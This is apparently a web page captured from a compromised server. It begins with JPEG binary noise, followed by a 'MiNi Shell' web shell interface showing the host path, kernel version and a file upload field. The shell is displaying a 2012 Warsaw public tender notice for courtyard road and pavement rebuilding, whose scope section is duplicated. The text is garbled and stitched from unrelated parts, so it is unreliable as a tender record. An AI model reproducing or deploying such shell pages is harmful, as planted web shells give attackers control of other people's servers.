JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120529/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120529/118345-N-2012.html

<p class="kh_header"><b>Warszawa: Wykonanie przebudowy nawierzchni dróg wewnętrznych, placu manewrowego i chodników wnętrza podwórzowego 
przy ul. Wielickiej 29 w Warszawie.</b><br>
<b>Numer ogłoszenia: 118345 - 2012; data zamieszczenia: 29.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie przebudowy nawierzchni dróg wewnętrznych, placu manewrowego i chodników wnętrza podwórzowego 
przy ul. Wielickiej 29 w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia oraz warunki jego realizacji i gwarancji. 
Wykonawca zobowiązany będzie do wykonania robót drogowych polegających na przebudowie nawierzchni dróg wewnętrznych, placu manewrowego i chodników wnętrza podwórzowego przy ul. Wielickiej 29 w Warszawie - teren administrowany przez Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m.st. Warszawy - zgodnie z projektem wykonawczym, stanowiącym Rozdział IV siwz ,  sporządzonym w maju 2012 r. przez -alfa - PROJEKT - Pracownia Projektowania 
i Nadzoru wraz z wykonaniem prac towarzyszących, które nie zostały ujęte jako oddzielne pozycje w kosztorysie ofertowym tj.: organizacją i zabezpieczeniem terenu budowy, kompleksową obsługą geodezyjną oraz badaniami laboratoryjnymi. 

1.1.W zakres Przedmiotu zamówienia wchodzą roboty ujęte w przedmiarze robót dla  Wykonawcy określającym rodzaj i ilość planowanych do wykonania robót, tj.: 
 - zabezpieczanie drzew, 
 - roboty rozbiórkowe,
 - roboty ziemne,
 - regulacja wysokościowa urządzeń podziemnych,
 - wykonanie nawierzchni wjazdu od ulicy i do budynku, placu, chodnika terenowego 
z kostki brukowej, opaska z płyt przy budynku,
        - wykonanie skosów dla niepełnosprawnych,
  - wyposażenie terenu w ławki i śmietniczki,
         - usunięcie zabezpieczenia drzew, zakładanie trawników,
      - wykonania następujących badań laboratoryjnych: badanie nośności VSS podbudowy zasadniczej z kruszywa łamanego - 1 szt. oraz badanie wytrzymałości na ściskanie warstwy piasku stabilizowanego cementem - 2 kpl.
         - sporządzenia geodezyjnej inwentaryzacji powykonawczej.
2. Czynności, o których mowa w pkt. 3.1. będą wykonywane pod nadzorem Działu 
ds. Zieleni ZGN w Dzielnicy Mokotów m.st. Warszawy, 02-647 Warszawa, 
ul. Bachmacka 1A.
3. 	Prawidłowe wykonanie robót, o których mowa w pkt. 3.1. potwierdzone będzie protokołem bezusterkowego odbioru końcowego przez inspektora nadzoru inwestorskiego ds. robót drogowych. Wynagrodzenie za realizację robót, o których mowa w pkt. 3.1. wypłacone będzie po otrzymaniu faktury, wystawionej przez Wykonawcę. Faktura wystawiana będzie na podstawie zweryfikowanego przez inspektora nadzoru inwestorskiego kosztorysu zamiennego, sporządzonego w oparciu o zatwierdzone obmiary robót i ceny jednostkowe robót wynikające z kosztorysu ofertowego, który Wykonawca przedłoży w ofercie (załącznik nr 1 do oferty) oraz na podstawie bezusterkowego protokołu odbioru końcowego robót.    
4. 	Wykonawca zobowiązany będzie do prowadzenia dziennika robót na zasadach przewidzianych dla dziennika budowy. 
5. 	Wszędzie tam, gdzie w specyfikacji i jej załącznikach wymieniono z nazwy typ lub producenta materiałów lub urządzeń, Zamawiający dopuszcza rozwiązania równoważne. 
6. 	Warunki realizacji zamówienia i gwarancji zawiera dokumentacja techniczna : Projekt wykonawczy - stanowiący Rozdział IV SIWZ, przedmiar robót określający rodzaj i ilość planowanych do wykonania robót - stanowiący Rozdział V SIWZ, Kosztorys ofertowy - stanowiący Rozdział VI SIWZ, szczegółowa specyfikacja techniczna - stanowiąca Rozdział VII SIWZ oraz Istotne postanowienia umowy stanowiące Rozdział III specyfikacji istotnych warunków zamówienia.
7. 	Czynności, o których mowa w pkt. 3.1. niniejszej specyfikacji, mają być wykonywane  zgodnie z:
1. projektem wykonawczym: projekt drogowy i ukształtowania terenu sporządzonym przez -alfa- PROJEKT- - Pracownia Projektowania i Nadzoru, Warszawa, ul. Kinowa 23 m. 30 w maju 2012 r., stanowiącym Rozdział IV SIWZ,
2. przedmiarem robót dla oferenta określającym rodzaj i ilość planowanych do wykonania robót: przebudowa nawierzchni dróg wewnętrznych, placu manewrowego i chodników, wnętrza podwórzowego przy ul. Wielickiej 29 w Warszawie stanowiącym Rozdział V SIWZ oraz kosztorysem ofertowym, stanowiącym Rozdział VI SIWZ,
3.warunkami określonymi w szczegółowej specyfikacji technicznej składającej się z 31 części.
 4.warunkami wynikającymi z przepisów technicznych, obowiązkami wymienionymi w art. 22 Ustawy z dnia 07.07.1994 r. Prawo budowlane (tj. Dz. U. z 2010 r., nr 75, poz. 474 z późn. zm.) oraz w aktach wykonawczych do  tej ustawy,
          5.   wymaganiami wynikającymi z aktualnych norm i aprobat technicznych,
          6.  zasadami rzetelnej wiedzy technicznej i sztuki budowlanej,
          7. kosztorysem ofertowym, stanowiącym Rozdział VI  siwz, sporządzonym wg   przedmiaru robót, określającego rodzaj i ilość planowanych do wykonania robót,
     8. warunkami wynikającymi z Istotnych postanowień umowy stanowiących Rozdział III specyfikacji istotnych warunków zamówienia.
8.1. 	Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy zawartej w wyniku rozstrzygnięcia przedmiotowego postępowania, o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego oraz w przypadku zmiany porządku prawnego, a także w przypadku zmian zawartych 
w specyfikacji istotnych warunków zamówienia w tym: 
8.1.1.W przypadku wystąpienia okoliczności uniemożliwiających prowadzenie robót zgodnie z technologią ich wykonania termin realizacji robót może ulec zmianie. Zostanie on wydłużony o okres, na który roboty zostały wstrzymane. Fakt ten musi być potwierdzony wpisem Zamawiającego do dziennika robót, o którym mowa w § 1  ust. 6 Istotnych postanowień umowy.
8.1.2.Zamawiający zastrzega sobie możliwość rezygnacji z wykonania części robót objętych Zamówieniem, nie więcej jednak niż 20 % wartości zamówienia. 
8.1.3.W trakcie realizacji przedmiotu zamówienia Wykonawca może dokonać zmiany Podwykonawców w sytuacji, gdy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy, koniecznym będzie dla prawidłowego wykonania umowy posłużenie się przez Wykonawcę nowymi Podwykonawcami, którzy będą realizowali część lub cały zakres powierzony uprzednio innym Podwykonawcom.
8.1.4. W przypadku zaistnienia konieczności wykonania robót dodatkowych, które nie zostały przewidziane w przedmiarze robót stanowiącym zał. nr 2 do Istotnych postanowień umowy (Rozdział III siwz), koniecznych do wykonania przedmiotu zamówienia Wykonawca zobowiązany jest wykonać je na odrębne zlecenie Zamawiającego. Wartość robót dodatkowych nie może  przekroczyć 50% wartości realizowanego zamówienia. 
Zmiany, o których mowa wyżej wymagają formy pisemnej pod rygorem nieważności.
9. Wykonawca zobowiązany będzie do stosowania w trakcie wykonywania przedmiotu zamówienia materiałów i produktów, odpowiadających wymaganiom ujętych w art. 10 ustawy Prawo budowlane i w Ustawie z dnia 16 kwietnia 2004 r. o wyrobach budowlanych, z wyłączeniem materiałów, wskazanych w rozporządzeniu MSWiA z dnia 24 lipca 1998 w sprawie określenia wykazu wyrobów nie mającego istotnego wpływu na spełnienie wymogów podstawowych. Jeżeli na przewidywany do wykorzystania materiał lub wyrób nie ustanowiono normy technicznej to Wykonawca musi posiadać następujące, aktualne dokumenty: krajowe aprobaty techniczne (AT) lub europejskie aprobaty techniczne (ETA). Normy techniczne, których wymagania muszą spełniać stosowane materiały i wyroby, są wymienione w szczegółowej specyfikacji technicznej, stanowiącej Rozdział VII SIWZ, Projekcie wykonawczym - stanowiącym Rozdział IV SIWZ i przedmiarem robót, określającym rodzaj i ilość planowanych do wykonania robót,- stanowiącym Rozdział V SIWZ. Wykonawca zobowiązany będzie do przedłożenia Zamawiającemu przed rozpoczęciem wykonywania robót w/w dokumentów dotyczących stosowanych materiałów.
  Ponadto podczas wykonywania zamówienia Wykonawca na każde żądanie Zamawiającego zobowiązany będzie okazać w stosunku do wskazanych materiałów certyfikaty na znak bezpieczeństwa, deklaracje zgodności lub certyfikat zgodności z Polską Normą lub z aktualną aprobatą techniczną. 
10. Wykonawca zobowiązany będzie w ramach ceny za realizację  Przedmiotu zamówienia do organizacji i zabezpieczenia terenu budowy, wykonania następujących badań laboratoryjnych: badanie nośności VSS podbudowy zasadniczej z kruszywa łamanego- 1 szt., badanie wytrzymałości na ściskanie warstwy piasku stabilizowanego cementem - 2 kpl., oraz sporządzenia geodezyjnej inwentaryzacji powykonawczej.
11. W okresie realizacji przedmiotu zamówienia Wykonawca może korzystać z instalacji wodno - kanalizacyjnej i energii elektrycznej na warunkach określonych w Istotnych postanowieniach umowy, które stanowią Rozdział III specyfikacji istotnych warunków zamówienia.
12. Wykonawca zobowiązany będzie do udzielenia gwarancji na wykonane przez siebie roboty będące przedmiotem zamówienia, o których mowa w pkt. 3.1. specyfikacji istotnych warunków zamówienia oraz w § 1 Istotnych postanowień umowy (Rozdział III specyfikacji) oraz zastosowane materiały, na czas min 36 miesięcy od daty bezusterkowego odbioru końcowego tych robót z tym, że dla materiałów okres ten nie może być krótszy niż gwarancja udzielona przez producenta.
13. Wykonawca musi się zobowiązać do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% wartości oferty brutto, na zasadach określonych w pkt. 20 specyfikacji. 
14. Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Opis przedmiotu zamówienia oraz warunki jego realizacji i gwarancji. 
Wykonawca zobowiązany będzie do wykonania robót drogowych polegających na przebudowie nawierzchni dróg wewnętrznych, placu manewrowego i chodników wnętrza podwórzowego przy ul. Wielickiej 29 w Warszawie - teren administrowany przez Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m.st. Warszawy - zgodnie z projektem wykonawczym, stanowiącym Rozdział IV siwz ,  sporządzonym w maju 2012 r. przez -alfa - PROJEKT - Pracownia Projektowania 
i Nadzoru wraz z wykonaniem prac towarzyszących, które nie zostały ujęte jako oddzielne pozycje w kosztorysie ofertowym tj.: organizacją i zabezpieczeniem terenu budowy, kompleksową obsługą geodezyjną oraz badaniami laboratoryjnymi. 

1.1.W zakres Przedmiotu zamówienia wchodzą roboty ujęte w przedmiarze robót dla  Wykonawcy określającym rodzaj i ilość planowanych do wykonania robót, tj.: 
 - zabezpieczanie drzew, 
 - roboty rozbiórkowe,
 - roboty ziemne,
 - regulacja wysokościowa urządzeń podziemnych,
 - wykonanie nawierzchni wjazdu od ulicy i do budynku, placu, chodnika terenowego 
z kostki brukowej, opaska z płyt przy budynku,
        - wykonanie skosów dla niepełnosprawnych,
  - wyposażenie terenu w ławki i śmietniczki,
         - usunięcie zabezpieczenia drzew, zakładanie trawników,
      - wykonania następujących badań laboratoryjnych: badanie nośności VSS podbudowy zasadniczej z kruszywa łamanego - 1 szt. oraz badanie wytrzymałości na ściskanie warstwy piasku stabilizowanego cementem - 2 kpl.
         - sporządzenia geodezyjnej inwentaryzacji powykonawczej.
2. Czynności, o których mowa w pkt. 3.1. będą wykonywane pod nadzorem Działu 
ds. Zieleni ZGN w Dzielnicy Mokotów m.st. Warszawy, 02-647 Warszawa, 
ul. Bachmacka 1A.
3. 	Prawidłowe wykonanie robót, o których mowa w pkt. 3.1. potwierdzone będzie protokołem bezusterkowego odbioru końcowego przez inspektora nadzoru inwestorskiego ds. robót drogowych. Wynagrodzenie za realizację robót, o których mowa w pkt. 3.1. wypłacone będzie po otrzymaniu faktury, wystawionej przez Wykonawcę. Faktura wystawiana będzie na podstawie zweryfikowanego przez inspektora nadzoru inwestorskiego kosztorysu zamiennego, sporządzonego w oparciu o zatwierdzone obmiary robót i ceny jednostkowe robót wynikające z kosztorysu ofertowego, który Wykonawca przedłoży w ofercie (załącznik nr 1 do oferty) oraz na podstawie bezusterkowego protokołu odbioru końcowego robót.    
4. 	Wykonawca zobowiązany będzie do prowadzenia dziennika robót na zasadach przewidzianych dla dziennika budowy. 
5. 	Wszędzie tam, gdzie w specyfikacji i jej załącznikach wymieniono z nazwy typ lub producenta materiałów lub urządzeń, Zamawiający dopuszcza rozwiązania równoważne. 
6. 	Warunki realizacji zamówienia i gwarancji zawiera dokumentacja techniczna : Projekt wykonawczy - stanowiący Rozdział IV SIWZ, przedmiar robót określający rodzaj i ilość planowanych do wykonania robót - stanowiący Rozdział V SIWZ, Kosztorys ofertowy - stanowiący Rozdział VI SIWZ, szczegółowa specyfikacja techniczna - stanowiąca Rozdział VII SIWZ oraz Istotne postanowienia umowy stanowiące Rozdział III specyfikacji istotnych warunków zamówienia.
7. 	Czynności, o których mowa w pkt. 3.1. niniejszej specyfikacji, mają być wykonywane  zgodnie z:
1. projektem wykonawczym: projekt drogowy i ukształtowania terenu sporządzonym przez -alfa- PROJEKT- - Pracownia Projektowania i Nadzoru, Warszawa, ul. Kinowa 23 m. 30 w maju 2012 r., stanowiącym Rozdział IV SIWZ,
2. przedmiarem robót dla oferenta określającym rodzaj i ilość planowanych do wykonania robót: przebudowa nawierzchni dróg wewnętrznych, placu manewrowego i chodników, wnętrza podwórzowego przy ul. Wielickiej 29 w Warszawie stanowiącym Rozdział V SIWZ oraz kosztorysem ofertowym, stanowiącym Rozdział VI SIWZ,
3.warunkami określonymi w szczegółowej specyfikacji technicznej składającej się z 31 części.
 4.warunkami wynikającymi z przepisów technicznych, obowiązkami wymienionymi w art. 22 Ustawy z dnia 07.07.1994 r. Prawo budowlane (tj. Dz. U. z 2010 r., nr 75, poz. 474 z późn. zm.) oraz w aktach wykonawczych do  tej ustawy,
          5.   wymaganiami wynikającymi z aktualnych norm i aprobat technicznych,
          6.  zasadami rzetelnej wiedzy technicznej i sztuki budowlanej,
          7. kosztorysem ofertowym, stanowiącym Rozdział VI  siwz, sporządzonym wg   przedmiaru robót, określającego rodzaj i ilość planowanych do wykonania robót,
     8. warunkami wynikającymi z Istotnych postanowień umowy stanowiących Rozdział III specyfikacji istotnych warunków zamówienia.
8.1. 	Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy zawartej w wyniku rozstrzygnięcia przedmiotowego postępowania, o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego oraz w przypadku zmiany porządku prawnego, a także w przypadku zmian zawartych 
w specyfikacji istotnych warunków zamówienia w tym: 
8.1.1.W przypadku wystąpienia okoliczności uniemożliwiających prowadzenie robót zgodnie z technologią ich wykonania termin realizacji robót może ulec zmianie. Zostanie on wydłużony o okres, na który roboty zostały wstrzymane. Fakt ten musi być potwierdzony wpisem Zamawiającego do dziennika robót, o którym mowa w § 1  ust. 6 Istotnych postanowień umowy.
8.1.2.Zamawiający zastrzega sobie możliwość rezygnacji z wykonania części robót objętych Zamówieniem, nie więcej jednak niż 20 % wartości zamówienia. 
8.1.3.W trakcie realizacji przedmiotu zamówienia Wykonawca może dokonać zmiany Podwykonawców w sytuacji, gdy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy, koniecznym będzie dla prawidłowego wykonania umowy posłużenie się przez Wykonawcę nowymi Podwykonawcami, którzy będą realizowali część lub cały zakres powierzony uprzednio innym Podwykonawcom.
8.1.4. W przypadku zaistnienia konieczności wykonania robót dodatkowych, które nie zostały przewidziane w przedmiarze robót stanowiącym zał. nr 2 do Istotnych postanowień umowy (Rozdział III siwz), koniecznych do wykonania przedmiotu zamówienia Wykonawca zobowiązany jest wykonać je na odrębne zlecenie Zamawiającego. Wartość robót dodatkowych nie może  przekroczyć 50% wartości realizowanego zamówienia. 
Zmiany, o których mowa wyżej wymagają formy pisemnej pod rygorem nieważności.
9. Wykonawca zobowiązany będzie do stosowania w trakcie wykonywania przedmiotu zamówienia materiałów i produktów, odpowiadających wymaganiom ujętych w art. 10 ustawy Prawo budowlane i w Ustawie z dnia 16 kwietnia 2004 r. o wyrobach budowlanych, z wyłączeniem materiałów, wskazanych w rozporządzeniu MSWiA z dnia 24 lipca 1998 w sprawie określenia wykazu wyrobów nie mającego istotnego wpływu na spełnienie wymogów podstawowych. Jeżeli na przewidywany do wykorzystania materiał lub wyrób nie ustanowiono normy technicznej to Wykonawca musi posiadać następujące, aktualne dokumenty: krajowe aprobaty techniczne (AT) lub europejskie aprobaty techniczne (ETA). Normy techniczne, których wymagania muszą spełniać stosowane materiały i wyroby, są wymienione w szczegółowej specyfikacji technicznej, stanowiącej Rozdział VII SIWZ, Projekcie wykonawczym - stanowiącym Rozdział IV SIWZ i przedmiarem robót, określającym rodzaj i ilość planowanych do wykonania robót,- stanowiącym Rozdział V SIWZ. Wykonawca zobowiązany będzie do przedłożenia Zamawiającemu przed rozpoczęciem wykonywania robót w/w dokumentów dotyczących stosowanych materiałów.
  Ponadto podczas wykonywania zamówienia Wykonawca na każde żądanie Zamawiającego zobowiązany będzie okazać w stosunku do wskazanych materiałów certyfikaty na znak bezpieczeństwa, deklaracje zgodności lub certyfikat zgodności z Polską Normą lub z aktualną aprobatą techniczną. 
10. Wykonawca zobowiązany będzie w ramach ceny za realizację  Przedmiotu zamówienia do organizacji i zabezpieczenia terenu budowy, wykonania następujących badań laboratoryjnych: badanie nośności VSS podbudowy zasadniczej z kruszywa łamanego- 1 szt., badanie wytrzymałości na ściskanie warstwy piasku stabilizowanego cementem - 2 kpl., oraz sporządzenia geodezyjnej inwentaryzacji powykonawczej.
11. W okresie realizacji przedmiotu zamówienia Wykonawca może korzystać z instalacji wodno - kanalizacyjnej i energii elektrycznej na warunkach określonych w Istotnych postanowieniach umowy, które stanowią Rozdział III specyfikacji istotnych warunków zamówienia.
12. Wykonawca zobowiązany będzie do udzielenia gwarancji na wykonane przez siebie roboty będące przedmiotem zamówienia, o których mowa w pkt. 3.1. specyfikacji istotnych warunków zamówienia oraz w § 1 Istotnych postanowień umowy (Rozdział III specyfikacji) oraz zastosowane materiały, na czas min 36 miesięcy od daty bezusterkowego odbioru końcowego tych robót z tym, że dla materiałów okres ten nie może być krótszy niż gwarancja udzielona przez producenta.
13. Wykonawca musi się zobowiązać do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% wartości oferty brutto, na zasadach określonych w pkt. 20 specyfikacji. 
14. Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.10-5, 45.11.12.13-4, 45.11.12.00-0, 45.23.24.51-8, 45.23.32.22-1, 45.23.32.61-6, 58.87.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1500,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
na podstawie art. 24 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
       Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 6 do wzoru formularza oferty ( pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie spełniania warunków w zakresie wskazanym poniżej:
1.1. Zamawiający oceni jako spełniony, warunek posiadania przez Wykonawcę wiedzy i doświadczenia, na podstawie wykazu robót budowlanych, z którego wynikać będzie, że Wykonawca w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej 2 roboty budowlane polegające na wykonaniu robót drogowych odpowiadających przedmiotowi zamówienia,  o wartości nie mniejszej niż  140.000,- zł netto każda. W tym celu Wykonawca musi wypełnić wykaz robót stanowiący załącznik nr 7 do wzoru formularza oferty oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
2.2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione łącznie.</p>
